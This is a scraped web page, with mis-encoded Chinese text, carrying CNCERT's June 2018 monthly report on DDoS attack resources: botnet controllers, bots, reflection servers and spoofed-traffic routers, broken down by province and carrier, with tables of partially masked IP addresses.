攻击资æºå®šä¹‰ 本报告为2018å¹´6月份的DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æžåŠåŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Šã€‚å›´ç»•äº’è”网环境å¨èƒæ²»ç†é—®é¢˜ï¼ŒåŸºäºŽCNCERT监测的DDoS攻击事件数æ®è¿›è¡ŒæŠ½æ ·åˆ†æžï¼Œé‡ç‚¹å¯¹â€œDDoS攻击是从哪些网络资æºä¸Šå‘èµ·çš„â€è¿™ä¸ªé—®é¢˜è¿›è¡Œåˆ†æžã€‚ 主è¦åˆ†æžçš„æ”»å‡»èµ„æºåŒ…括: 1ã€æŽ§åˆ¶ç«¯èµ„æºï¼ŒæŒ‡ç”¨æ¥æŽ§åˆ¶å¤§é‡çš„åƒµå°¸ä¸»æœºèŠ‚ç‚¹å‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的木马或僵尸网络控制端。 2ã€è‚‰é¸¡èµ„æºï¼ŒæŒ‡è¢«æŽ§åˆ¶ç«¯åˆ©ç”¨ï¼Œå‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的僵尸主机节点。 3ã€åå°„æœåŠ¡å™¨èµ„æºï¼ŒæŒ‡èƒ½å¤Ÿè¢«é»‘客利用å‘èµ·å射攻击的æœåС噍ã€ä¸»æœºç‰è®¾æ–½ï¼Œå®ƒä»¬æä¾›çš„网络æœåŠ¡ä¸ï¼Œå¦‚æžœå˜åœ¨æŸäº›ç½‘络æœåŠ¡ï¼Œä¸éœ€è¦è¿›è¡Œè®¤è¯å¹¶ä¸”具有放大效果,åˆåœ¨äº’è”网上大é‡éƒ¨ç½²ï¼ˆå¦‚DNSæœåŠ¡å™¨ï¼ŒNTPæœåС噍ç‰ï¼‰ï¼Œå®ƒä»¬å°±å¯èƒ½æˆä¸ºè¢«åˆ©ç”¨å‘èµ·DDoS攻击的网络资æºã€‚ 4ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä»»æ„ä¼ªé€ IP攻击æµé‡çš„è·¯ç”±å™¨ã€‚ç”±äºŽæˆ‘å›½è¦æ±‚è¿è¥å•†åœ¨æŽ¥å…¥ç½‘上进行æºåœ°å€éªŒè¯ï¼Œå› æ¤è·¨åŸŸä¼ªé€ æµé‡çš„å˜åœ¨ï¼Œè¯´æ˜Žè¯¥è·¯ç”±å™¨æˆ–其下路由器的æºåœ°å€éªŒè¯é…ç½®å¯èƒ½å˜åœ¨ç¼ºé™·ï¼Œä¸”该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。 5ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä¼ªé€ 本区域IP攻击æµé‡çš„路由器。说明该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。 在本报告ä¸ï¼Œä¸€æ¬¡DDoS攻击事件是指在ç»éªŒæ”»å‡»å‘¨æœŸå†…,ä¸åŒçš„æ”»å‡»èµ„æºé’ˆå¯¹å›ºå®šç›®æ ‡çš„å•个DDoS攻击,攻击周期时长ä¸è¶…过24å°æ—¶ã€‚如果相åŒçš„æ”»å‡»ç›®æ ‡è¢«ç›¸åŒçš„æ”»å‡»èµ„æºæ‰€æ”»å‡»ï¼Œä½†é—´éš”为24å°æ—¶æˆ–更多,则该事件被认为是两次攻击。æ¤å¤–,DDoS攻击资æºåŠæ”»å‡»ç›®æ ‡åœ°å€å‡æŒ‡å…¶IP地å€ï¼Œå®ƒä»¬çš„地ç†ä½ç½®ç”±å®ƒçš„IP地å€å®šä½å¾—到。 DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æž 1. æŽ§åˆ¶ç«¯èµ„æºåˆ†æž æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用肉鸡å‘èµ·DDoS攻击的控制端有277个,其ä¸ï¼Œ28个控制端ä½äºŽæˆ‘国境内,249个控制端ä½äºŽå¢ƒå¤–。 ä½äºŽå¢ƒå¤–的控制端按国家或地区分布,美国å 的比例最大,å 42.6%,其次是法国和ä¸å›½é¦™æ¸¯ï¼Œå¦‚图1所示。 图1 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区 ä½äºŽå¢ƒå†…的控制端按çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 28.6%,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 53.6%,è”通å 14.3%,如图2所示。 图2 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ å‘起攻击最多的境内控制端å‰äºŒåååŠå½’属如表1所示,主è¦ä½äºŽæ±Ÿè‹çœå’Œæµ™æ±Ÿçœã€‚ 表1 本月å‘起攻击最多的境内控制端TOP20 æŽ§åˆ¶ç«¯åœ°å€ å½’å±žçœä»½ 归属è¿è¥å•†æˆ–云æœåС商 123.X.X.143 è´µå·žçœ ç”µä¿¡ 222.X.X.88 江è‹çœ 电信 123.X.X.28 è´µå·žçœ ç”µä¿¡ 118.X.X.50 å¹¿ä¸œçœ ç”µä¿¡ 115.X.X.105 æµ™æ±Ÿçœ ç”µä¿¡ 42.X.X.152 æ²³å—çœ è”通 14.X.X.241 å¹¿ä¸œçœ ç”µä¿¡ 114.X.X.150 北京市 电信 139.X.X.51 上海市 阿里云 61.X.X.112 江è‹çœ 电信 119.X.X.73 å±±ä¸œçœ è”通 42.X.X.198 æ²³å—çœ è”通 123.X.X.85 è´µå·žçœ ç”µä¿¡ 42.X.X.193 æ²³å—çœ è”通 118.X.X.246 è¾½å®çœ 腾讯云 122.X.X.165 æµ™æ±Ÿçœ ç”µä¿¡ 115.X.X.74 æµ™æ±Ÿçœ ç”µä¿¡ 115.X.X.191 æµ™æ±Ÿçœ ç”µä¿¡ 182.X.X.227 上海市 腾讯云 114.X.X.239 北京市 电信 2018å¹´1月至今监测到的控制端ä¸ï¼Œ4.7%的控制端在本月ä»å¤„于活跃状æ€ï¼Œå…±è®¡69个,其ä¸ä½äºŽæˆ‘国境内的控制端数é‡ä¸º33个,ä½äºŽå¢ƒå¤–的控制端数é‡ä¸º36个。æŒç»æ´»è·ƒçš„境内控制端åŠå½’属如表2所示。 表2 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDOS攻击的境内控制端 æŽ§åˆ¶ç«¯åœ°å€ å½’å±žçœä»½ 归属è¿è¥å•† 14.X.X.173 云å—çœ è”通 […]]]></description>
2032 <content:encoded><![CDATA[<h2>本月é‡ç‚¹å…³æ³¨æƒ…况</h2>
2033<blockquote><p style="text-align: justify;">1ã€æœ¬æœˆåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoS攻击的控制端ä¸ï¼Œå¢ƒå¤–控制端近一åŠä½äºŽç¾Žå›½ï¼›å¢ƒå†…控制端最多ä½äºŽåŒ—京市,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼ŒæŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大。</p>
2034<p style="text-align: justify;">2ã€æœ¬æœˆå‚与攻击较多的肉鸡地å€ä¸»è¦ä½äºŽåŒ—京市ã€è´µå·žçœã€å››å·çœå’Œäº‘å—çœï¼Œå…¶ä¸å¤§é‡è‚‰é¸¡åœ°å€å½’属于电信è¿è¥å•†ã€‚2018年以æ¥ç›‘测到的æŒç»æ´»è·ƒçš„肉鸡资æºä¸ï¼Œä½äºŽå±±ä¸œçœã€ä¸Šæµ·å¸‚ã€å¹¿ä¸œçœå 的比例最大。</p>
2035<p style="text-align: justify;">3ã€æœ¬æœˆè¢«åˆ©ç”¨å‘èµ·Memcachedå射攻击境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å±±ä¸œçœã€å¹¿ä¸œçœå’ŒåŒ—äº¬å¸‚ï¼Œæ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç”µä¿¡ã€‚被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å¹¿ä¸œçœã€å±±ä¸œçœå’Œç”˜è‚ƒçœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç§»åŠ¨ã€‚è¢«åˆ©ç”¨å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯è¾½å®çœã€æ±Ÿè‹çœå’Œæ²³å—çœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯è”通。</p>
2036<p style="text-align: justify;">4ã€æœ¬æœˆè½¬å‘ä¼ªé€ è·¨åŸŸæ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于新疆维å¾å°”自治区移动的æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›åŒ—äº¬å¸‚ã€æ±Ÿè‹çœå’Œå±±ä¸œçœçš„è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚</p>
2037<p style="text-align: justify;">5ã€æœ¬æœˆè½¬å‘ä¼ªé€ æœ¬åœ°æ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于山西çœç”µä¿¡çš„æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›æ±Ÿè‹çœã€å±±è¥¿çœã€é™•西çœå’Œå¹¿ä¸œçœçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚</p>
2038<p style="text-align: justify;">6ã€ç»è¿‡åŠå¹´æ¥é’ˆå¯¹æˆ‘国境内的攻击资æºçš„专项治ç†å·¥ä½œï¼Œå¢ƒå†…控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›å¢ƒå†…æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›å¢ƒå†…åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއå˜åŒ–䏿˜Žæ˜¾ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。</p>
2039</blockquote>
2040<h2>攻击资æºå®šä¹‰</h2>
2041<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">本报告为2018å¹´6月份的DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æžåŠåŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Šã€‚å›´ç»•äº’è”网环境å¨èƒæ²»ç†é—®é¢˜ï¼ŒåŸºäºŽCNCERT监测的DDoS攻击事件数æ®è¿›è¡ŒæŠ½æ ·åˆ†æžï¼Œé‡ç‚¹å¯¹â€œDDoS攻击是从哪些网络资æºä¸Šå‘èµ·çš„â€è¿™ä¸ªé—®é¢˜è¿›è¡Œåˆ†æžã€‚</b></p>
2042<p style="text-align: justify;">主è¦åˆ†æžçš„æ”»å‡»èµ„æºåŒ…括:</p>
2043<blockquote><p style="text-align: justify;">1ã€æŽ§åˆ¶ç«¯èµ„æºï¼ŒæŒ‡ç”¨æ¥æŽ§åˆ¶å¤§é‡çš„åƒµå°¸ä¸»æœºèŠ‚ç‚¹å‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的木马或僵尸网络控制端。</p>
2044<p style="text-align: justify;">2ã€è‚‰é¸¡èµ„æºï¼ŒæŒ‡è¢«æŽ§åˆ¶ç«¯åˆ©ç”¨ï¼Œå‘æ”»å‡»ç›®æ ‡å‘èµ·DDoS攻击的僵尸主机节点。</p>
2045<p style="text-align: justify;">3ã€åå°„æœåŠ¡å™¨èµ„æºï¼ŒæŒ‡èƒ½å¤Ÿè¢«é»‘客利用å‘èµ·å射攻击的æœåС噍ã€ä¸»æœºç‰è®¾æ–½ï¼Œå®ƒä»¬æä¾›çš„网络æœåŠ¡ä¸ï¼Œå¦‚æžœå˜åœ¨æŸäº›ç½‘络æœåŠ¡ï¼Œä¸éœ€è¦è¿›è¡Œè®¤è¯å¹¶ä¸”具有放大效果,åˆåœ¨äº’è”网上大é‡éƒ¨ç½²ï¼ˆå¦‚DNSæœåŠ¡å™¨ï¼ŒNTPæœåС噍ç‰ï¼‰ï¼Œå®ƒä»¬å°±å¯èƒ½æˆä¸ºè¢«åˆ©ç”¨å‘èµ·DDoS攻击的网络资æºã€‚</p>
2046<p style="text-align: justify;">4ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä»»æ„ä¼ªé€ IP攻击æµé‡çš„è·¯ç”±å™¨ã€‚ç”±äºŽæˆ‘å›½è¦æ±‚è¿è¥å•†åœ¨æŽ¥å…¥ç½‘上进行æºåœ°å€éªŒè¯ï¼Œå› æ¤è·¨åŸŸä¼ªé€ æµé‡çš„å˜åœ¨ï¼Œè¯´æ˜Žè¯¥è·¯ç”±å™¨æˆ–其下路由器的æºåœ°å€éªŒè¯é…ç½®å¯èƒ½å˜åœ¨ç¼ºé™·ï¼Œä¸”该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。</p>
2047<p style="text-align: justify;">5ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ï¼Œæ˜¯æŒ‡è½¬å‘了大é‡ä¼ªé€ 本区域IP攻击æµé‡çš„路由器。说明该路由器下的网络ä¸å˜åœ¨å‘动DDoS攻击的设备。</p>
2048</blockquote>
2049<p style="text-align: justify;">在本报告ä¸ï¼Œä¸€æ¬¡DDoS攻击事件是指在ç»éªŒæ”»å‡»å‘¨æœŸå†…,ä¸åŒçš„æ”»å‡»èµ„æºé’ˆå¯¹å›ºå®šç›®æ ‡çš„å•个DDoS攻击,攻击周期时长ä¸è¶…过24å°æ—¶ã€‚如果相åŒçš„æ”»å‡»ç›®æ ‡è¢«ç›¸åŒçš„æ”»å‡»èµ„æºæ‰€æ”»å‡»ï¼Œä½†é—´éš”为24å°æ—¶æˆ–更多,则该事件被认为是两次攻击。æ¤å¤–,DDoS攻击资æºåŠæ”»å‡»ç›®æ ‡åœ°å€å‡æŒ‡å…¶IP地å€ï¼Œå®ƒä»¬çš„地ç†ä½ç½®ç”±å®ƒçš„IP地å€å®šä½å¾—到。</p>
2050<h2>DDoSæ”»å‡»èµ„æºæœˆåº¦åˆ†æž</h2>
2051<h3>1. <b style="">控制端资æºåˆ†æž</b></h3>
2052<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,利用肉鸡å‘èµ·DDoS攻击的控制端有277个,其ä¸ï¼Œ28个控制端ä½äºŽæˆ‘国境内,249个控制端ä½äºŽå¢ƒå¤–。</p>
2053<p style="text-align: justify;">ä½äºŽå¢ƒå¤–的控制端按国家或地区分布,美国å 的比例最大,å 42.6%,其次是法国和ä¸å›½é¦™æ¸¯ï¼Œå¦‚图1所示。</p>
2054<p><img alt="本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区" src="http://image.3001.net/images/20180724/15324137913763.png!small" width="690" height="191.11510791366908"></p>
2055<p style="text-align: center;">图1 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå¤–æŽ§åˆ¶ç«¯æ•°é‡æŒ‰å›½å®¶æˆ–地区</p>
2056<p style="text-align: justify;">ä½äºŽå¢ƒå†…的控制端按çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,å 28.6%,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,å 53.6%,è”通å 14.3%,如图2所示。</p>
2057<p><img alt="本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒæœ¬æœˆå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/1532413804502.png!small" width="690" height="269.49056603773585"></p>
2058<p style="text-align: center;">图2 本月å‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2059<p style="text-align: justify;">å‘起攻击最多的境内控制端å‰äºŒåååŠå½’属如表1所示,主è¦ä½äºŽæ±Ÿè‹çœå’Œæµ™æ±Ÿçœã€‚</p>
2060<p style="text-align: center;">表1 本月å‘起攻击最多的境内控制端TOP20</p>
2061<table>
2062<colgroup>
2063<col>
2064<col>
2065<col> </colgroup>
2066<thead>
2067<tr>
2068<th><strong>控制端地å€</strong></th>
2069<th><strong>归属çœä»½</strong></th>
2070<th><strong>归属è¿è¥å•†æˆ–云æœåС商</strong></th>
2071</tr>
2072</thead>
2073<tbody>
2074<tr>
2075<td>123.X.X.143</td>
2076<td>贵州çœ</td>
2077<td>电信</td>
2078</tr>
2079<tr>
2080<td>222.X.X.88</td>
2081<td>江è‹çœ</td>
2082<td>电信</td>
2083</tr>
2084<tr>
2085<td>123.X.X.28</td>
2086<td>贵州çœ</td>
2087<td>电信</td>
2088</tr>
2089<tr>
2090<td>118.X.X.50</td>
2091<td>广东çœ</td>
2092<td>电信</td>
2093</tr>
2094<tr>
2095<td>115.X.X.105</td>
2096<td>浙江çœ</td>
2097<td>电信</td>
2098</tr>
2099<tr>
2100<td>42.X.X.152</td>
2101<td>æ²³å—çœ</td>
2102<td>è”通</td>
2103</tr>
2104<tr>
2105<td>14.X.X.241</td>
2106<td>广东çœ</td>
2107<td>电信</td>
2108</tr>
2109<tr>
2110<td>114.X.X.150</td>
2111<td>北京市</td>
2112<td>电信</td>
2113</tr>
2114<tr>
2115<td>139.X.X.51</td>
2116<td>上海市</td>
2117<td>阿里云</td>
2118</tr>
2119<tr>
2120<td>61.X.X.112</td>
2121<td>江è‹çœ</td>
2122<td>电信</td>
2123</tr>
2124<tr>
2125<td>119.X.X.73</td>
2126<td>山东çœ</td>
2127<td>è”通</td>
2128</tr>
2129<tr>
2130<td>42.X.X.198</td>
2131<td>æ²³å—çœ</td>
2132<td>è”通</td>
2133</tr>
2134<tr>
2135<td>123.X.X.85</td>
2136<td>贵州çœ</td>
2137<td>电信</td>
2138</tr>
2139<tr>
2140<td>42.X.X.193</td>
2141<td>æ²³å—çœ</td>
2142<td>è”通</td>
2143</tr>
2144<tr>
2145<td>118.X.X.246</td>
2146<td>è¾½å®çœ</td>
2147<td>腾讯云</td>
2148</tr>
2149<tr>
2150<td>122.X.X.165</td>
2151<td>浙江çœ</td>
2152<td>电信</td>
2153</tr>
2154<tr>
2155<td>115.X.X.74</td>
2156<td>浙江çœ</td>
2157<td>电信</td>
2158</tr>
2159<tr>
2160<td>115.X.X.191</td>
2161<td>浙江çœ</td>
2162<td>电信</td>
2163</tr>
2164<tr>
2165<td>182.X.X.227</td>
2166<td>上海市</td>
2167<td>腾讯云</td>
2168</tr>
2169<tr>
2170<td>114.X.X.239</td>
2171<td>北京市</td>
2172<td>电信</td>
2173</tr>
2174</tbody>
2175</table>
2176<h2 style="text-align: justify;"></h2>
2177<p>2018å¹´1月至今监测到的控制端ä¸ï¼Œ4.7%的控制端在本月ä»å¤„于活跃状æ€ï¼Œå…±è®¡69个,其ä¸ä½äºŽæˆ‘国境内的控制端数é‡ä¸º33个,ä½äºŽå¢ƒå¤–的控制端数é‡ä¸º36个。æŒç»æ´»è·ƒçš„境内控制端åŠå½’属如表2所示。</p>
2178<p style="text-align: center;">表2 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDOS攻击的境内控制端</p>
2179<table>
2180<colgroup>
2181<col>
2182<col>
2183<col> </colgroup>
2184<thead>
2185<tr>
2186<th><strong>控制端地å€</strong></th>
2187<th><strong>归属çœä»½</strong></th>
2188<th><strong>归属è¿è¥å•†</strong></th>
2189</tr>
2190</thead>
2191<tbody>
2192<tr>
2193<td>14.X.X.173</td>
2194<td>云å—çœ</td>
2195<td>è”通</td>
2196</tr>
2197<tr>
2198<td>211.X.X.156</td>
2199<td>湖北çœ</td>
2200<td>è”通</td>
2201</tr>
2202<tr>
2203<td>218.X.X.30</td>
2204<td>黑龙江çœ</td>
2205<td>è”通</td>
2206</tr>
2207<tr>
2208<td>121.X.X.62</td>
2209<td>浙江çœ</td>
2210<td>电信</td>
2211</tr>
2212<tr>
2213<td>42.X.X.104</td>
2214<td>è¾½å®çœ</td>
2215<td>è”通</td>
2216</tr>
2217<tr>
2218<td>113.X.X.35</td>
2219<td>广东çœ</td>
2220<td>电信</td>
2221</tr>
2222<tr>
2223<td>115.X.X.39</td>
2224<td>浙江çœ</td>
2225<td>电信</td>
2226</tr>
2227<tr>
2228<td>220.X.X.164</td>
2229<td>天津市</td>
2230<td>è”通</td>
2231</tr>
2232<tr>
2233<td>123.X.X.169</td>
2234<td>山东çœ</td>
2235<td>è”通</td>
2236</tr>
2237<tr>
2238<td>61.X.X.60</td>
2239<td>æ²³å—çœ</td>
2240<td>è”通</td>
2241</tr>
2242<tr>
2243<td>117.X.X.110</td>
2244<td>陕西çœ</td>
2245<td>电信</td>
2246</tr>
2247<tr>
2248<td>183.X.X.75</td>
2249<td>浙江çœ</td>
2250<td>电信</td>
2251</tr>
2252<tr>
2253<td>183.X.X.19</td>
2254<td>浙江çœ</td>
2255<td>电信</td>
2256</tr>
2257<tr>
2258<td>139.X.X.174</td>
2259<td>剿ž—çœ</td>
2260<td>è”通</td>
2261</tr>
2262<tr>
2263<td>115.X.X.206</td>
2264<td>浙江çœ</td>
2265<td>电信</td>
2266</tr>
2267<tr>
2268<td>117.X.X.199</td>
2269<td>陕西çœ</td>
2270<td>电信</td>
2271</tr>
2272<tr>
2273<td>222.X.X.48</td>
2274<td>江è‹çœ</td>
2275<td>电信</td>
2276</tr>
2277<tr>
2278<td>111.X.X.158</td>
2279<td>北京市</td>
2280<td>è”通</td>
2281</tr>
2282<tr>
2283<td>27.X.X.34</td>
2284<td>山东çœ</td>
2285<td>è”通</td>
2286</tr>
2287<tr>
2288<td>111.X.X.159</td>
2289<td>北京市</td>
2290<td>è”通</td>
2291</tr>
2292<tr>
2293<td>123.X.X.153</td>
2294<td>山东çœ</td>
2295<td>è”通</td>
2296</tr>
2297<tr>
2298<td>117.X.X.112</td>
2299<td>江西çœ</td>
2300<td>电信</td>
2301</tr>
2302<tr>
2303<td>101.X.X.195</td>
2304<td>北京市</td>
2305<td>电信</td>
2306</tr>
2307<tr>
2308<td>61.X.X.89</td>
2309<td>æ²³å—çœ</td>
2310<td>è”通</td>
2311</tr>
2312<tr>
2313<td>111.X.X.196</td>
2314<td>江西çœ</td>
2315<td>电信</td>
2316</tr>
2317<tr>
2318<td>117.X.X.207</td>
2319<td>陕西çœ</td>
2320<td>电信</td>
2321</tr>
2322<tr>
2323<td>117.X.X.107</td>
2324<td>江西çœ</td>
2325<td>电信</td>
2326</tr>
2327<tr>
2328<td>113.X.X.149</td>
2329<td>é‡åº†å¸‚</td>
2330<td>è”通</td>
2331</tr>
2332<tr>
2333<td>175.X.X.203</td>
2334<td>æ¹–å—çœ</td>
2335<td>电信</td>
2336</tr>
2337<tr>
2338<td>121.X.X.108</td>
2339<td>河北çœ</td>
2340<td>è”通</td>
2341</tr>
2342<tr>
2343<td>61.X.X.201</td>
2344<td>江è‹çœ</td>
2345<td>电信</td>
2346</tr>
2347<tr>
2348<td>183.X.X.41</td>
2349<td>浙江çœ</td>
2350<td>电信</td>
2351</tr>
2352<tr>
2353<td>183.X.X.35</td>
2354<td>浙江çœ</td>
2355<td>电信</td>
2356</tr>
2357</tbody>
2358</table>
2359<p>2018å¹´1月至今æŒç»æ´»è·ƒçš„境内控制端按çœä»½ç»Ÿè®¡ï¼Œæµ™æ±Ÿçœæ‰€å 比例最大,为21.2%;按è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,为54.5%,è”通å 45.5%,如图3所示。</p>
2360<h3><img alt="2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138201538.png!small" width="690" height="259.6465696465697"></h3>
2361<p style="text-align: center;">图3 2018å¹´ä»¥æ¥æŒç»æ´»è·ƒå‘èµ·DDoSæ”»å‡»çš„å¢ƒå†…æŽ§åˆ¶ç«¯æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2362<h3>2. 肉鸡资æºåˆ†æž</h3>
2363<p style="text-align: justify;">æ ¹æ®CNCERTæŠ½æ ·ç›‘æµ‹æ•°æ®ï¼Œ2018å¹´6月,共有117,690个肉鸡地å€å‚ä¸ŽçœŸå®žåœ°å€æ”»å‡»ï¼ˆåŒ…å«çœŸå®žåœ°å€æ”»å‡»ä¸Žå…¶å®ƒæ”»å‡»çš„æ··åˆæ”»å‡»ï¼‰ã€‚</p>
2364<p style="text-align: justify;">è¿™äº›è‚‰é¸¡èµ„æºæŒ‰çœä»½ç»Ÿè®¡ï¼ŒåŒ—京市å 的比例最大,为7.9%,其次是贵州çœã€å››å·çœå’Œäº‘å—çœï¼›æŒ‰è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大,为54.0%,è”通å 25.7%,移动å 17.5%,如图4所示。</p>
2365<p style="text-align: justify;"><img alt="æœ¬æœˆè‚‰é¸¡åœ°å€æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ" src="http://image.3001.net/images/20180724/15324138647157.png!small" width="690" height="311.1509433962264"></p>
2366<p style="text-align: center;">图4 æœ¬æœˆè‚‰é¸¡åœ°å€æ•°é‡æŒ‰çœä»½å’Œè¿è¥å•†åˆ†å¸ƒ</p>
2367<p style="text-align: center;">
2368<p style="text-align: justify;">本月å‚与攻击最多的肉鸡地å€å‰äºŒåååŠå½’属如表3所示,ä½äºŽå±±è¥¿çœçš„åœ°å€æœ€å¤šã€‚</p>
2369<p style="text-align: center;">表3 本月å‚与攻击最多的肉鸡地å€TOP20</p>
2370<table>
2371<colgroup>
2372<col>
2373<col>
2374<col> </colgroup>
2375<thead>
2376<tr>
2377<th>肉鸡地å€</th>
2378<th>归属çœä»½</th>
2379<th>归属è¿è¥å•†</th>
2380</tr>
2381</thead>
2382<tbody>
2383<tr>
2384<td>58.X.X.148</td>
2385<td>山东çœ</td>
2386<td>电信</td>
2387</tr>
2388<tr>
2389<td>124.X.X.2</td>
2390<td>山西çœ</td>
2391<td>è”通</td>
2392</tr>
2393<tr>
2394<td>123.X.X.32</td>
2395<td>内蒙å¤è‡ªæ²»åŒº</td>
2396<td>电信</td>
2397</tr>
2398<tr>
2399<td>122.X.X.199</td>
2400<td>æ²³å—çœ</td>
2401<td>è”通</td>
2402</tr>
2403<tr>
2404<td>183.X.X.66</td>
2405<td>山西çœ</td>
2406<td>移动</td>
2407</tr>
2408<tr>
2409<td>111.X.X.2</td>
2410<td>山西çœ</td>
2411<td>移动</td>
2412</tr>
2413<tr>
2414<td>58.X.X.12</td>
2415<td>山东çœ</td>
2416<td>电信</td>
2417</tr>
2418<tr>
2419<td>60.X.X.211</td>
2420<td>山西çœ</td>
2421<td>è”通</td>
2422</tr>
2423<tr>
2424<td>106.X.X.223</td>
2425<td>新疆维å¾å°”æ—自治区</td>
2426<td>电信</td>
2427</tr>
2428<tr>
2429<td>124.X.X.2</td>
2430<td>æ²³å—çœ</td>
2431<td>è”通</td>
2432</tr>
2433<tr>
2434<td>118.X.X.101</td>
2435<td>å››å·çœ</td>
2436<td>电信</td>
2437</tr>
